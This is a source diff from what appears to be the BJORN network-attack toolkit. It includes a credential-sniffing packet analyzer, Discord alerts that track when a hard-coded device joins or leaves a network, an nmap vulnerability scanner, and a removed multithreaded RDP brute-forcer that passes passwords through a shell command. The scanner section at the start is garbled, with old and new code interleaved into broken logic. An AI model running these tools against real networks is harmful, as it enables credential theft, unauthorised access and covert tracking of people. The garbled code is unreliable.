mac = row.get("MAC Address") or row.get("mac_address") or ""
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
ports_str = ""
if mac:
r = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if r and r[0].get('ports'):
ports_str = r[0]['ports']
if not ports_str:
ports_str = (
row.get("Ports") or row.get("ports") or
meta.get("ports_snapshot") or ""
)
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
if not ports_str:
logger.warning(f"No ports to scan for {ip}")
self.shared_data.bjorn_progress = ""
return 'failed'
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
ports = [p.strip() for p in ports_str.split(';') if p.strip()]
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
# Nettoyage des ports (garder juste le numéro si format 80/tcp)
ports = [p.split('/')[0] for p in ports]
return combined_result if success else None
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports))}
logger.debug(f"Found {len(ports)} ports for {ip}: {ports[:5]}...")
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
# 3) Filtrage "Rescan Only"
if self.shared_data.config.get('vuln_rescan_on_change_only', False):
if self._has_been_scanned(mac):
original_count = len(ports)
ports = self._filter_ports_already_scanned(mac, ports)
logger.debug(f"Filtered {original_count - len(ports)} already-scanned ports")
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
if not ports:
logger.info(f"No new/changed ports to scan for {ip}")
self.shared_data.bjorn_progress = "100%"
return 'success'
# 4) SCAN AVEC PROGRESSION
if self.shared_data.orchestrator_should_exit:
return 'failed'
logger.info(f"Starting nmap scan on {len(ports)} ports for {ip}")
findings = self.scan_vulnerabilities(ip, ports)
if self.shared_data.orchestrator_should_exit:
logger.info("Scan interrupted by user")
return 'failed'
# 5) Déduplication en mémoire avant persistance
findings = self._deduplicate_findings(findings)
# 6) Persistance
self.save_vulnerabilities(mac, ip, findings)
# Finalisation UI
self.shared_data.bjorn_progress = "100%"
self.shared_data.comment_params = {"ip": ip, "vulns_found": str(len(findings))}
logger.success(f"Vuln scan done on {ip}: {len(findings)} entries")
return 'success'
else:
return 'success' # considering failed as success as we just need to scan vulnerabilities once
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
except Exception as e:
logger.error(f"NmapVulnScanner failed for {ip}: {e}")
self.shared_data.bjorn_progress = "Error"
return 'failed'
def _has_been_scanned(self, mac: str) -> bool:
rows = self.shared_data.db.query("""
SELECT 1 FROM action_queue
WHERE mac_address=? AND action_name='NmapVulnScanner'
AND status IN ('success', 'failed')
LIMIT 1
""", (mac,))
return bool(rows)
def _filter_ports_already_scanned(self, mac: str, ports: List[str]) -> List[str]:
if not ports:
return []
rows = self.shared_data.db.query("""
SELECT port, last_seen
FROM detected_software
WHERE mac_address=? AND is_active=1 AND port IS NOT NULL
""", (mac,))
seen = {}
for r in rows:
try:
seen[str(r['port'])] = r.get('last_seen')
except Exception:
pass
ttl = int(self.shared_data.config.get('vuln_rescan_ttl_seconds', 0) or 0)
if ttl > 0:
cutoff = datetime.utcnow() - timedelta(seconds=ttl)
final_ports = []
for p in ports:
if p not in seen:
final_ports.append(p)
else:
capture = False
return "; ".join(vulnerabilities)
try:
dt = datetime.fromisoformat(seen[p].replace('Z', ''))
if dt < cutoff:
final_ports.append(p)
except Exception:
pass
return final_ports
else:
return [p for p in ports if p not in seen]
def save_results(self, mac_address, ip, scan_result):
# ---------------------------- Helpers -------------------------------- #
def _deduplicate_findings(self, findings: List[Dict]) -> List[Dict]:
"""Supprime les doublons (même port + vuln_id) pour éviter des inserts inutiles."""
seen: set = set()
deduped = []
for f in findings:
key = (str(f.get('port', '')), str(f.get('vuln_id', '')))
if key not in seen:
seen.add(key)
deduped.append(f)
return deduped
def _extract_cpe_values(self, port_info: Dict[str, Any]) -> List[str]:
cpe = port_info.get('cpe')
if not cpe:
return []
if isinstance(cpe, str):
return [x.strip() for x in cpe.splitlines() if x.strip()]
if isinstance(cpe, (list, tuple, set)):
return [str(x).strip() for x in cpe if str(x).strip()]
return [str(cpe).strip()]
def extract_cves(self, text: str) -> List[str]:
"""Extrait les CVE via regex pré-compilé (pas de recompilation à chaque appel)."""
if not text:
return []
return CVE_RE.findall(str(text))
# ---------------------------- Scanning (Batch Mode) ------------------------------ #
def scan_vulnerabilities(self, ip: str, ports: List[str]) -> List[Dict]:
"""
Saves the detailed scan results to a file.
Orchestre le scan en lots (batches) pour permettre la mise à jour
de la barre de progression.
"""
all_findings = []
fast = bool(self.shared_data.config.get('vuln_fast', True))
use_vulners = bool(self.shared_data.config.get('nse_vulners', False))
max_ports = int(self.shared_data.config.get('vuln_max_ports', 10 if fast else 20))
# Pause entre batches important sur Pi Zero pour laisser respirer le CPU
batch_pause = float(self.shared_data.config.get('vuln_batch_pause', 0.5))
# Taille de lot réduite par défaut (2 sur Pi Zero, configurable)
batch_size = int(self.shared_data.config.get('vuln_batch_size', 2))
target_ports = ports[:max_ports]
total = len(target_ports)
if total == 0:
return []
batches = [target_ports[i:i + batch_size] for i in range(0, total, batch_size)]
processed_count = 0
for batch in batches:
if self.shared_data.orchestrator_should_exit:
break
port_str = ','.join(batch)
# Mise à jour UI avant le scan du lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
self.shared_data.comment_params = {
"ip": ip,
"progress": f"{processed_count}/{total} ports",
"current_batch": port_str
}
t0 = time.time()
# Scan du lot (instanciation locale pour éviter la corruption d'état)
if fast:
batch_findings = self._scan_fast_cpe_cve(ip, port_str, use_vulners)
else:
batch_findings = self._scan_heavy(ip, port_str)
elapsed = time.time() - t0
logger.debug(f"Batch [{port_str}] scanned in {elapsed:.1f}s {len(batch_findings)} finding(s)")
all_findings.extend(batch_findings)
processed_count += len(batch)
# Mise à jour post-lot
pct = int((processed_count / total) * 100)
self.shared_data.bjorn_progress = f"{pct}%"
# Pause CPU entre batches (vital sur Pi Zero)
if batch_pause > 0 and processed_count < total:
time.sleep(batch_pause)
return all_findings
def _scan_fast_cpe_cve(self, ip: str, port_list: str, use_vulners: bool) -> List[Dict]:
vulns: List[Dict] = []
nm = nmap.PortScanner() # Instance locale pas de partage d'état
# --version-light au lieu de --version-all : bien plus rapide sur Pi Zero
# --min-rate/--max-rate : évite de saturer CPU et réseau
args = (
"-sV --version-light -T4 "
"--max-retries 1 --host-timeout 60s --script-timeout 20s "
"--min-rate 50 --max-rate 100"
)
if use_vulners:
args += " --script vulners --script-args mincvss=0.0"
logger.debug(f"[FAST] nmap {ip} -p {port_list}")
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
logger.error(f"Fast batch scan failed for {ip} [{port_list}]: {e}")
return vulns
if ip not in nm.all_hosts():
return vulns
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
# CPE
for cpe in self._extract_cpe_values(port_info):
vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'service-detect',
'details': f"CPE: {cpe}"
})
# CVE via vulners
if use_vulners:
script_out = (port_info.get('script') or {}).get('vulners')
if script_out:
for cve in self.extract_cves(script_out):
vulns.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': 'vulners',
'details': str(script_out)[:200]
})
return vulns
def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
vulnerabilities: List[Dict] = []
nm = nmap.PortScanner() # Instance locale
vuln_scripts = [
'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
]
script_arg = ','.join(vuln_scripts)
# --min-rate/--max-rate pour ne pas saturer le Pi
args = (
f"-sV --script={script_arg} -T3 "
"--script-timeout 30s --min-rate 50 --max-rate 100"
)
logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
nm.scan(hosts=ip, ports=port_list, arguments=args)
except Exception as e:
logger.error(f"Error saving summary: {e}")
logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
return vulnerabilities
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
if ip not in nm.all_hosts():
return vulnerabilities
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
host = nm[ip]
discovered_ports_in_batch: set = set()
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for proto in host.all_protocols():
for port in host[proto].keys():
discovered_ports_in_batch.add(str(port))
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for future in as_completed(futures):
progress.update(task, advance=1)
for script_name, output in (port_info.get('script') or {}).items():
for cve in self.extract_cves(str(output)):
vulnerabilities.append({
'port': port,
'service': service,
'vuln_id': cve,
'script': script_name,
'details': str(output)[:200]
})
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")
# CPE Scan optionnel (sur ce batch)
if bool(self.shared_data.config.get('scan_cpe', False)):
ports_for_cpe = list(discovered_ports_in_batch)
if ports_for_cpe:
vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))
return vulnerabilities
def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
cpe_vulns = []
nm = nmap.PortScanner() # Instance locale
try:
port_list = ','.join([str(p) for p in ports])
# --version-light à la place de --version-all (bien plus rapide)
args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
nm.scan(hosts=ip, ports=port_list, arguments=args)
if ip in nm.all_hosts():
host = nm[ip]
for proto in host.all_protocols():
for port in host[proto].keys():
port_info = host[proto][port]
service = port_info.get('name', '') or ''
for cpe in self._extract_cpe_values(port_info):
cpe_vulns.append({
'port': port,
'service': service,
'vuln_id': f"CPE:{cpe}",
'script': 'version-scan',
'details': f"CPE: {cpe}"
})
except Exception as e:
logger.error(f"scan_cpe failed for {ip}: {e}")
return cpe_vulns
# ---------------------------- Persistence ---------------------------- #
def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
hostname = None
try:
host_row = self.shared_data.db.query_one(
"SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if host_row and host_row.get('hostnames'):
hostname = host_row['hostnames'].split(';')[0]
except Exception:
pass
findings_by_port: Dict[int, Dict] = {}
for f in findings:
port = int(f.get('port', 0) or 0)
if port not in findings_by_port:
findings_by_port[port] = {'cves': set(), 'cpes': set()}
vid = str(f.get('vuln_id', ''))
vid_upper = vid.upper()
if vid_upper.startswith('CVE-'):
findings_by_port[port]['cves'].add(vid)
elif vid_upper.startswith('CPE:'):
# On stocke sans le préfixe "CPE:"
findings_by_port[port]['cpes'].add(vid[4:])
# 1) CVEs
for port, data in findings_by_port.items():
for cve in data['cves']:
try:
self.shared_data.db.execute("""
INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
""", (mac, ip, hostname, port, cve))
except Exception as e:
logger.error(f"Save CVE err: {e}")
# 2) CPEs
for port, data in findings_by_port.items():
for cpe in data['cpes']:
try:
self.shared_data.db.add_detected_software(
mac_address=mac, cpe=cpe, ip=ip,
hostname=hostname, port=port
)
except Exception as e:
logger.error(f"Save CPE err: {e}")
logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")

247
actions/odin_eye.py Normal file
View File

@@ -0,0 +1,247 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os
import json
try:
import pyshark
HAS_PYSHARK = True
except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
from collections import defaultdict
from typing import Any, Dict, List, Optional
from logger import Logger
logger = Logger(name="odin_eye.py")
# -------------------- Action metadata --------------------
b_class = "OdinEye"
b_module = "odin_eye"
b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4 # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"
b_args = {
"interface": {
"type": "select",
"label": "Network Interface",
"choices": ["auto", "wlan0", "eth0"],
"default": "auto",
"help": "Interface to listen on."
},
"filter": {
"type": "text",
"label": "BPF Filter",
"default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
},
"max_packets": {
"type": "number",
"label": "Max packets",
"min": 100,
"max": 100000,
"step": 100,
"default": 1000
},
"save_creds": {
"type": "checkbox",
"label": "Save Credentials",
"default": True
}
}
CREDENTIAL_PATTERNS = {
'http': {
'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
'password': [r'password=([^&]+)', r'pass=([^&]+)']
},
'ftp': {
'username': [r'USER\s+(.+)', r'USERNAME\s+(.+)'],
'password': [r'PASS\s+(.+)']
},
'smtp': {
'auth': [r'AUTH\s+PLAIN\s+(.+)', r'AUTH\s+LOGIN\s+(.+)']
}
}
class OdinEye:
def __init__(self, shared_data):
self.shared_data = shared_data
self.capture = None
self.stop_event = threading.Event()
self.statistics = defaultdict(int)
self.credentials: List[Dict[str, Any]] = []
self.lock = threading.Lock()
def process_packet(self, packet):
"""Analyze a single packet for patterns and credentials."""
try:
with self.lock:
self.statistics['total_packets'] += 1
if hasattr(packet, 'highest_layer'):
self.statistics[packet.highest_layer] += 1
if hasattr(packet, 'tcp'):
# HTTP
if hasattr(packet, 'http'):
self._analyze_http(packet)
# FTP
elif hasattr(packet, 'ftp'):
self._analyze_ftp(packet)
# SMTP
elif hasattr(packet, 'smtp'):
self._analyze_smtp(packet)
# Payload generic check
if hasattr(packet.tcp, 'payload'):
self._analyze_payload(packet.tcp.payload)
except Exception as e:
logger.debug(f"Packet processing error: {e}")
def _analyze_http(self, packet):
if hasattr(packet.http, 'request_uri'):
uri = packet.http.request_uri
for field in ['username', 'password']:
for pattern in CREDENTIAL_PATTERNS['http'][field]:
m = re.findall(pattern, uri, re.I)
if m:
self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_ftp(self, packet):
if hasattr(packet.ftp, 'request_command'):
cmd = packet.ftp.request_command.upper()
if cmd in ['USER', 'PASS']:
field = 'username' if cmd == 'USER' else 'password'
self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))
def _analyze_smtp(self, packet):
if hasattr(packet.smtp, 'command_line'):
line = packet.smtp.command_line
for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
m = re.findall(pattern, line, re.I)
if m:
self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))
def _analyze_payload(self, payload):
patterns = {
'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
}
for name, pattern in patterns.items():
m = re.findall(pattern, payload)
if m:
self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")
def _add_cred(self, proto, field, value, source):
with self.lock:
cred = {
'protocol': proto,
'type': field,
'value': value,
'timestamp': datetime.now().isoformat(),
'source': source
}
if cred not in self.credentials:
self.credentials.append(cred)
logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
def execute(self, ip, port, row, status_key) -> str:
"""Standard entry point."""
iface = getattr(self.shared_data, "odin_eye_interface", "auto")
if iface == "auto":
iface = None # pyshark handles None as default
bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")
logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")
try:
self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)
start_time = time.time()
packet_count = 0
# Use sniff_continuously for real-time processing
for packet in self.capture.sniff_continuously():
if self.shared_data.orchestrator_should_exit:
break
if time.time() - start_time > timeout:
logger.info("OdinEye: Timeout reached.")
break
packet_count += 1
if packet_count >= max_pkts:
logger.info("OdinEye: Max packets reached.")
break
self.process_packet(packet)
# Periodic progress update (every 50 packets)
if packet_count % 50 == 0:
prog = int((packet_count / max_pkts) * 100)
self.shared_data.bjorn_progress = f"{prog}%"
self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
except Exception as e:
logger.error(f"Capture error: {e}")
self.shared_data.log_milestone(b_class, "Error", str(e))
return "failed"
finally:
if self.capture:
try: self.capture.close()
except: pass
# Save results
if self.credentials or self.statistics['total_packets'] > 0:
os.makedirs(output_dir, exist_ok=True)
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
json.dump({
"stats": dict(self.statistics),
"credentials": self.credentials
}, f, indent=4)
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
return "success"
if __name__ == "__main__":
from init_shared import shared_data
eye = OdinEye(shared_data)
eye.execute("0.0.0.0", None, {}, "odin_eye")

84
actions/presence_join.py Normal file
View File

@@ -0,0 +1,84 @@
# actions/presence_join.py
# -*- coding: utf-8 -*-
"""
PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network.
- Triggered by the scheduler ONLY on transition OFF->ON (b_trigger="on_join").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceJoin", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceJoin"
b_module = "presence_join"
b_status = "PresenceJoin"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_join only fires on join transition
b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
logger.error(f"PresenceJoin: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceJoin: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the join.
ip/port = host targets (if known), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
name = f"{host} ({mac})" if host else mac
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceJoin error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceJoin ready (direct mode).")

84
actions/presence_left.py Normal file
View File

@@ -0,0 +1,84 @@
# actions/presence_left.py
# -*- coding: utf-8 -*-
"""
PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network.
- Triggered by the scheduler ONLY on transition ON->OFF (b_trigger="on_leave").
- Targeting via b_requires (e.g. {"any":[{"mac_is":"AA:BB:..."}]}).
- The action does not query anything: it only notifies when called.
"""
import requests
from typing import Optional
import logging
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
logger = Logger(name="PresenceLeave", level=logging.DEBUG)
# --- Metadata (truth is in DB; here for reference/consistency) --------------
b_class = "PresenceLeave"
b_module = "presence_left"
b_status = "PresenceLeave"
b_port = None
b_service = None
b_parent = None
b_priority = 90
b_cooldown = 0 # not needed: on_leave only fires on leave transition
b_rate_limit = None
b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
logger.error(f"PresenceLeave: HTTP {r.status_code}: {r.text}")
except Exception as e:
logger.error(f"PresenceLeave: webhook error: {e}")
def execute(self, ip: Optional[str], port: Optional[str], row: dict, status_key: str):
"""
Called by the orchestrator when the scheduler detected the disconnection.
ip/port = last known target (if available), row = host info.
"""
try:
mac = row.get("MAC Address") or row.get("mac_address") or "MAC"
host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- Last IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceLeave error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceLeave ready (direct mode).")

View File

@@ -1,198 +0,0 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
